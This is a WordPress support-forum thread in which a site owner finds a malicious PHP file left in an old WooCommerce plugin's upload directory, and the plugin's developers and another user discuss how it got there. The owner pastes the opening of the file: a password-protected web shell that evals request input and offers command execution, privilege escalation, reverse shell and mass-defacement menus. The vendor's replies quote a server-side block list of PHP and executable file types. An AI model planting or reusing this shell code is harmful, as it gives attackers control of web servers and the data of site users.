WordPress Backup Extraction on Windows. Threat Found. Exploit:JS/ShellCode.gen

Resolved

(@jethrohazelhurst)

Windows Defender discovered a threat while I was extracting a WordPress backup of my live site onto my localhost.

The warning is Exploit:JS/ShellCode.gen.

So I had a closer look at that file caches_data_thumb.php.

This is inside the directory “ppom_files”. Putting PPOM into google shows this was a plugin which was installed a while back to add extra options for WooCommerce products. This plugin was removed a while ago shortly after it was installed however the directories are still here.

I opened caches_data_thumb.php in my editor and it’s got some dodgy code in it with chinese characters, see below:

<?php
header("Content-type:text/html;charset=gbk");
$password='wp_caches';
$shellname='Hello By xxxx';
$myurl=null;
error_reporting(0);
ob_start();
define('myaddress',$_SERVER['SCRIPT_FILENAME']);
define('postpass',$password);
define('shellname',$shellname);
define('myurl',$myurl);
if(@get_magic_quotes_gpc()){
    foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v);
    foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v);
}
if(isset($_REQUEST[postpass])){
hmlogin(2);
@eval($_REQUEST[postpass]);
exit;}
if($_COOKIE['postpass'] != md5(postpass)){
    if($_POST['postpass']){
        if($_POST['postpass'] == postpass){
            setcookie('postpass',md5($_POST['postpass']));
            hmlogin();
        }else{
            echo '<CENTER>用户或密码错误</CENTER>';
        }
    }
    islogin($shellname,$myurl);
    exit;
}
if(isset($_GET['down'])) do_down($_GET['down']);
if(isset($_GET['pack'])){
    $dir = do_show($_GET['pack']);
    $zip = new eanver($dir);
    $out = $zip->out;
    do_download($out,$_SERVER['HTTP_HOST'].".tar.gz");
}
if(isset($_GET['unzip'])){
    css_main();
    start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']);
    exit;
}
define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');
define('run_win',substr(PHP_OS, 0, 3) == "WIN");
define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));
$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
$path = isset($_GET['path']) ? $_GET['path'] : root_dir;
$name = isset($_POST['name']) ? $_POST['name'] : "";
$img = isset($_GET['img']) ? $_GET['img'] : "";
$p = isset($_GET['p']) ? $_GET['p'] : "";
$pp = urlencode(dirname($p));
if($img) css_img($img);
if($eanver == "phpinfo") die(phpinfo());
if($eanver == 'logout'){
    setcookie('postpass',null);
    die('<meta http-equiv="refresh" content="0;URL=?">');
}
$class = array(
"信息操作" => array("upfiles" => "上传文件","phpinfo" => "基本信息","info_f" => "系统信息","phpcode" => "执行PHP脚本"),
"提权工具" => array("sqlshell" => "执行SQL执行","mysql_exec" => "MYSQL操作","myexp" => "MYSQL提权","servu" => "Serv-U提权","cmd" => "执行命令","linux" => "反弹提权","downloader" => "文件下载","port" => "端口扫描"),
"批量操作" => array("guama" => "批量挂马清马","tihuan" => "批量替换内容","scanfile" => "批量搜索文

etc etc, goes on for 100s of lines...

Inside that directory there is other code too. An index.html with html for a landing page for a roof replacement company!

This leads me to believe this plugin has added, or allowed the upload of, malicious code.

Now my question is why has this happened? And how do I vouch for the integrity of my WooCommerce site and clean up this mess? And who’s to say there isn’t more of this garbage hiding out in sub-folders of sub-folders!

Viewing 5 replies - 1 through 5 (of 5 total)

N-Media
(@nmedia)

5 years, 7 months ago

Hi,

It seems you allowed file upload and you didn’t set file types properly, you must deny the .PHP types and only accept the file you really need.

You should remove ppom_files entirely and then set the file types from File Input.

terrafire123
(@terrafire123)

5 years, 7 months ago

Sorry, but why doesn’t the plugin prevent PHP and HTML file upload? This seems like a extremely basic security precaution that users can’t and shouldn’t be expected to manage.

There are many, many extremely inexperienced webdevs, who, unlike OP, if in a similar situation would never be able to resolve this.

N-Media
(@nmedia)

5 years, 7 months ago

Hi,

yes our plugin has this already check to stop uploading the PHP, Html files like here I have even added the PHP file as allowed filetype: https://drive.google.com/file/d/10KTJeslAc6DoGIcaCLjoee5WATYiqk1A/view?usp=sharing

But on front-end, our plugin deny to accept it if someone try to upload these files:
https://nmdevteam.com/ppom/product/small-shirts/?ppom_title=file-upload-demo
terrafire123
(@terrafire123)

5 years, 7 months ago
Hi,

yes our plugin has this already check to stop uploading the PHP, Html files like here I have even added the PHP file as allowed filetype: https://drive.google.com/file/d/10KTJeslAc6DoGIcaCLjoee5WATYiqk1A/view?usp=sharing

But on front-end, our plugin deny to accept it if someone try to upload these files:
https://nmdevteam.com/ppom/product/small-shirts/?ppom_title=file-upload-demo

….But if the server denies uploading of PHP files, then how can any of OP’s mistakes have caused the issue?

Front-end validation is, of course, NEVER enough, because the browser can’t ever be trusted…
- This reply was modified 5 years, 7 months ago by terrafire123.
- This reply was modified 5 years, 7 months ago by Yui.
N-Media
(@nmedia)

5 years, 7 months ago
Yes we know, the font-end validation is not enough, we have added this on server side you can see this inside inc/files.php near line 159 like this;
```
$bad_types = array('php','php4','php5','php6','php7','phtml','exe');
	
	if( in_array( strtolower($file_type), $bad_types) ){
		$response ['status'] = 'error';
		$response ['message'] = __ ( 'File type not valid - '.$file_type, 'nm-filemanager' );
		wp_send_json( $response );
	}
```

Viewing 5 replies - 1 through 5 (of 5 total)

The topic ‘WordPress Backup Extraction on Windows. Threat Found. Exploit:JS/ShellCode.gen’ is closed to new replies.